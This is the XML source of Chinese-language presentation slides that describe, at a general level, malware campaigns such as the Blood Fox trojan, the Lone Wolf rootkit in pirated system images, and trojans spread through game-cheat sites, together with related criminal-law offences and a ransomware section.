              <a:t>复杂性和查杀难度</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" b="1"/>
              <a:t>则创造了史上新高。</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279265"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血狐木马病毒，</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2018</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年</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6</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月</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="2" name="图片 1"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="628650"/>
            <a:ext cx="6172200" cy="5600700"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="文本框 2"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6301740" y="781685"/>
            <a:ext cx="5722620" cy="5408295"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0" anchor="t">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="342900" indent="-342900">
              <a:lnSpc>
                <a:spcPct val="120000"/>
              </a:lnSpc>
              <a:buFont typeface="Wingdings" panose="05000000000000000000" charset="0"/>
              <a:buChar char="Ø"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" b="1"/>
              <a:t>伪装的传奇微端</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" b="1">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>仿冒盗用</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" b="1"/>
              <a:t>知名公司名称去申请正规合法的数字签名；</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="342900" indent="-342900">
              <a:lnSpc>
                <a:spcPct val="120000"/>
              </a:lnSpc>
              <a:buFont typeface="Wingdings" panose="05000000000000000000" charset="0"/>
              <a:buChar char="Ø"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" b="1"/>
              <a:t>一旦安装了假冒的传奇微端，随即释放安装Rootkit性质的</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" b="1">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>顽固病毒</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" b="1"/>
              <a:t>，且当中毒电脑用户试图启动浏览器访问搜索引擎网站和电商网站时，</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" b="1">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>浏览器会被劫持到病毒作者设定的推广页面</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" b="1"/>
              <a:t>。</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="342900" indent="-342900">
              <a:lnSpc>
                <a:spcPct val="120000"/>
              </a:lnSpc>
              <a:buFont typeface="Wingdings" panose="05000000000000000000" charset="0"/>
              <a:buChar char="Ø"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" b="1"/>
              <a:t>由于“血狐”病毒</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" b="1">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>劫持的站点主要为各大购物站和知名搜索站</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" b="1"/>
              <a:t>，</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" b="1">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>当病毒感染达到一定量级时</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" b="1"/>
              <a:t>，这种通过劫持浏览器进行恶意推广的手法将能够给病毒作者带来丰厚的</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" b="1">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>佣金收入</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" b="1"/>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5633085"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独狼（</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sym typeface="+mn-ea"/>
                </a:rPr>
                <a:t>幽虫</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）家族病毒，</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2018</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年</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6</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月</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="文本框 2"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4807585" y="762635"/>
            <a:ext cx="7225030" cy="5408295"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0" anchor="t">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="342900" indent="-342900">
              <a:lnSpc>
                <a:spcPct val="120000"/>
              </a:lnSpc>
              <a:buFont typeface="Wingdings" panose="05000000000000000000" charset="0"/>
              <a:buChar char="Ø"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" b="1"/>
              <a:t>“独狼”系列</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" b="1">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Rootkit病毒</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" b="1"/>
              <a:t>的传播渠道为</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" b="1">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>盗版Ghost系统</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" b="1"/>
              <a:t>，在包括</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" b="1">
                <a:solidFill>
                  <a:srgbClr val="C00000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>装机助理、系统之家</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" b="1"/>
              <a:t>等常用的网站下载的盗版Ghost系统中均已发现该Rootkit病毒。</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="342900" indent="-342900">
              <a:lnSpc>
                <a:spcPct val="120000"/>
              </a:lnSpc>
              <a:buFont typeface="Wingdings" panose="05000000000000000000" charset="0"/>
              <a:buChar char="Ø"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" b="1"/>
              <a:t>可静</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" b="1">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>默推广安装浏览器</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" b="1"/>
              <a:t>，将浏览器首页设置为带推广渠道号的网址导航站；</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="342900" indent="-342900">
              <a:lnSpc>
                <a:spcPct val="120000"/>
              </a:lnSpc>
              <a:buFont typeface="Wingdings" panose="05000000000000000000" charset="0"/>
              <a:buChar char="Ø"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" b="1"/>
              <a:t>最新变种通过游戏平台</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" b="1">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>传播盗号木马</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" b="1"/>
              <a:t>；</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="342900" indent="-342900">
              <a:lnSpc>
                <a:spcPct val="120000"/>
              </a:lnSpc>
              <a:buFont typeface="Wingdings" panose="05000000000000000000" charset="0"/>
              <a:buChar char="Ø"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" b="1"/>
              <a:t>通过</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" b="1">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>恶意推广</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" b="1"/>
              <a:t>更多软件获利；</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="342900" indent="-342900">
              <a:lnSpc>
                <a:spcPct val="120000"/>
              </a:lnSpc>
              <a:buFont typeface="Wingdings" panose="05000000000000000000" charset="0"/>
              <a:buChar char="Ø"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" b="1"/>
              <a:t>Rootkit由于在盗版Ghost系统安装时就潜伏在系统里了，可以抢占先机</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" b="1">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>拦截阻止杀毒软件的查杀</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" b="1"/>
              <a:t>，Rootkit后门病毒同时</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" b="1">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>具备系统底层权限</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" b="1"/>
              <a:t>，Rootkit病毒也是公认</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" b="1">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>难以查杀</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" b="1"/>
              <a:t>的病毒类型。</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="342900" indent="-342900">
              <a:lnSpc>
                <a:spcPct val="120000"/>
              </a:lnSpc>
              <a:buFont typeface="Wingdings" panose="05000000000000000000" charset="0"/>
              <a:buChar char="Ø"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" b="1"/>
              <a:t>盗版Ghost系统一直都是</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" b="1">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>病毒传播的重要渠道</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" b="1"/>
              <a:t> 。</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="4" name="图片 3"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="106680" y="762635"/>
            <a:ext cx="4525645" cy="609536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516636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外挂幽灵团伙病毒，</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2018</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年</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" altLang="zh-CN" sz="2665" b="1" kern="10" dirty="0">
                  <a:solidFill>
                    <a:schemeClr val="bg1"/>
                  </a:solidFill>
                  <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                  <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                  <a:cs typeface="经典特宋简" pitchFamily="49" charset="-122"/>
                </a:rPr>
                <a:t>10</a:t>
              </a:r>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月</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="文本框 2"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5532120" y="1080135"/>
            <a:ext cx="6388100" cy="4965065"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0" anchor="t">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="342900" indent="-342900">
              <a:lnSpc>
                <a:spcPct val="120000"/>
              </a:lnSpc>
              <a:buFont typeface="Wingdings" panose="05000000000000000000" charset="0"/>
              <a:buChar char="Ø"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" b="1"/>
              <a:t>外挂程序是“</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" b="1">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>木马</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" b="1"/>
              <a:t>”偷取密码的最好载体</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="342900" indent="-342900">
              <a:lnSpc>
                <a:spcPct val="120000"/>
              </a:lnSpc>
              <a:buFont typeface="Wingdings" panose="05000000000000000000" charset="0"/>
              <a:buChar char="Ø"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" b="1"/>
              <a:t>该团伙主要通过七哥辅助网、我爱辅助网等多个</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" b="1">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>游戏辅助工具（外挂）网站传播</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" b="1"/>
              <a:t>“</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" b="1">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>双枪</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" b="1"/>
              <a:t>”、“</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" b="1">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>紫狐</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" b="1"/>
              <a:t>”等木马，故名“</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" b="1">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>外挂幽灵</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" b="1"/>
              <a:t>“。</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="342900" indent="-342900">
              <a:lnSpc>
                <a:spcPct val="120000"/>
              </a:lnSpc>
              <a:buFont typeface="Wingdings" panose="05000000000000000000" charset="0"/>
              <a:buChar char="Ø"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" b="1"/>
              <a:t>游戏玩家从这些游戏辅助网站下载并安装游戏外挂或辅助工具后，</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" b="1">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>浏览器主页将会被锁定</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" b="1"/>
              <a:t>，同时电脑会被</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" b="1">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>静默安装“开心输入法</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" b="1"/>
              <a:t>”等软件。</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="342900" indent="-342900">
              <a:lnSpc>
                <a:spcPct val="120000"/>
              </a:lnSpc>
              <a:buFont typeface="Wingdings" panose="05000000000000000000" charset="0"/>
              <a:buChar char="Ø"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" b="1"/>
              <a:t>全国各个省份均有发现，其中</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" b="1">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>山东、广东、河南</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" b="1"/>
              <a:t>的中毒电脑数量位居全国前三。</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr indent="0">
              <a:lnSpc>
                <a:spcPct val="120000"/>
              </a:lnSpc>
              <a:buFont typeface="Wingdings" panose="05000000000000000000" charset="0"/>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2400" b="1"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="4" name="图片 3"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="598170"/>
            <a:ext cx="5344160" cy="623824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7860" y="1093470"/>
            <a:ext cx="4566285" cy="3415030"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:solidFill>
              <a:schemeClr val="tx1"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0" anchor="t">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" b="1"/>
              <a:t>直播间滚屏喊话自动刷正能量</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2400" b="1"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" b="1"/>
              <a:t>智能识别/自动欢迎/礼物答谢</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2400" b="1"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" b="1"/>
              <a:t>全球定位/国外直播/关注回谢</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2400" b="1"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" b="1"/>
              <a:t>自动喊话/推广引流/抖商必备</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2400" b="1"/>
          </a:p>
          <a:p>
            <a:pPr algn="r"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" b="1"/>
              <a:t>——CK智能场控软件</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3573780" cy="501650"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="none">
              <a:spAutoFit/>
            </a:bodyPr>
            <a:lstStyle/>
            <a:p>
              <a:pPr lvl="0" algn="l"/>
              <a:r>
                <a:rPr lang="zh-CN" sz="2665" b="1" kern="10" dirty="0">
                  <a:solidFill>
                    <a:schemeClr val="bg1"/>
                  </a:solidFill>
                  <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                  <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                  <a:cs typeface="经典特宋简" pitchFamily="49" charset="-122"/>
                </a:rPr>
                <a:t>直播</a:t>
              </a:r>
              <a:r>
                <a:rPr sz="2665" b="1" kern="10" dirty="0">
                  <a:solidFill>
                    <a:schemeClr val="bg1"/>
                  </a:solidFill>
                  <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                  <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                  <a:cs typeface="经典特宋简" pitchFamily="49" charset="-122"/>
                </a:rPr>
                <a:t>外挂黑产悄然崛起</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="9" name="文本框 8"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7337425" y="1093470"/>
            <a:ext cx="4566285" cy="4154170"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:solidFill>
              <a:schemeClr val="tx1"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0" anchor="t">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" b="1"/>
              <a:t>1、侵犯著作权罪：</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2400" b="1"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" b="1"/>
              <a:t>2、非法获取计算机信息系统数据罪：</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2400" b="1"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" b="1"/>
              <a:t>3、破坏计算机信息系统罪：</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2400" b="1"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" b="1"/>
              <a:t>4、提供侵入、非法控制计算机信息系统程序、工具罪：</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="r"/>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2400" b="1"/>
          </a:p>
          <a:p>
            <a:pPr algn="r"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" b="1"/>
              <a:t>---</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" b="1"/>
              <a:t>《中华人民共和国刑法》</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594741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独狼、双枪、紫狐等木马组成的产业链</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="8" name="图片 7"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1718945" y="596265"/>
            <a:ext cx="9737090" cy="626173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10055" y="462915"/>
            <a:ext cx="10482580" cy="1137285"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0" anchor="t">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="4000" b="1">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>勒索病毒</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2800" b="1">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>新对抗（2010~2020）</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="3" name="图片 2"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="2378710" y="1600200"/>
            <a:ext cx="8641715" cy="513334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01345" y="977265"/>
            <a:ext cx="6883400" cy="2790190"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>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153924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勒索软件</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="4" name="图片 3"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId4"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="7088505" y="2656840"/>
            <a:ext cx="4712970" cy="4037330"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="8" name="文本框 7"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1804670" y="4272280"/>
            <a:ext cx="4754880" cy="460375"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" rtlCol="0" anchor="t">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr lvl="0" algn="l"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" b="1" kern="10" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:cs typeface="经典特宋简" pitchFamily="49" charset="-122"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>美国总统大选头号威胁：</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" b="1" kern="10" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:cs typeface="经典特宋简" pitchFamily="49" charset="-122"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>勒索软件</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="9" name="文本框 8"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7603490" y="977265"/>
            <a:ext cx="4340225" cy="1198880"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
